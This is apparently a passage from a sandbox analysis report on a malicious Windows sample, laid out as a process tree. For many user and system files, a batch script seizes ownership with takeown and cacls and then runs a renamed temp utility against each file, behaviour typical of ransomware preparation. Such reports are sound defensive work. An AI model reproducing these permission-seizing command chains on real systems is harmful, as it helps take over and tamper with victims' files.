                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8456
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7984
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:9136
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8512
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "PhotoViewer.dll.mui" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8500
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      lrEU2Z2i.exe -accepteula "PhotoViewer.dll.mui" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9104
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files (x86)\Windows Photo Viewer\uk-UA\PhotoViewer.dll.mui""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9020
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          cacls "C:\Program Files (x86)\Windows Photo Viewer\uk-UA\PhotoViewer.dll.mui" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8508
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            takeown /F "C:\Program Files (x86)\Windows Photo Viewer\uk-UA\PhotoViewer.dll.mui"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8588
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "PhotoViewer.dll.mui" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8676
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                lrEU2Z2i.exe -accepteula "PhotoViewer.dll.mui" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8544
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.a94bc26d-2903-4509-b74a-b98fb01279b3.1.etl""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8408
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.a94bc26d-2903-4509-b74a-b98fb01279b3.1.etl" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.a94bc26d-2903-4509-b74a-b98fb01279b3.1.etl"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8672
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "MoUsoCoreWorker.a94bc26d-2903-4509-b74a-b98fb01279b3.1.etl" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8768
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            lrEU2Z2i.exe -accepteula "MoUsoCoreWorker.a94bc26d-2903-4509-b74a-b98fb01279b3.1.etl" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8760
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8712
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:752
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                cacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8832
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                takeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8856
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "KnownGameList.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6336
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    lrEU2Z2i.exe -accepteula "KnownGameList.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8884
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8912
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7648
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:9008
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:9100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "0000000F.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6192
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                lrEU2Z2i.exe -accepteula "0000000F.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:9028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2788
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:9184
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5416
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "0000000Q.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6548
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      lrEU2Z2i.exe -accepteula "0000000Q.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6500
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7132
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:9156
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "00000014.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6676
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              lrEU2Z2i.exe -accepteula "00000014.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6476
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:9088
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4128
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "00000058.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1628
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        lrEU2Z2i.exe -accepteula "00000058.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6664
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7692
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3468
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "00000004.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6488
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  lrEU2Z2i.exe -accepteula "00000004.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:268
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
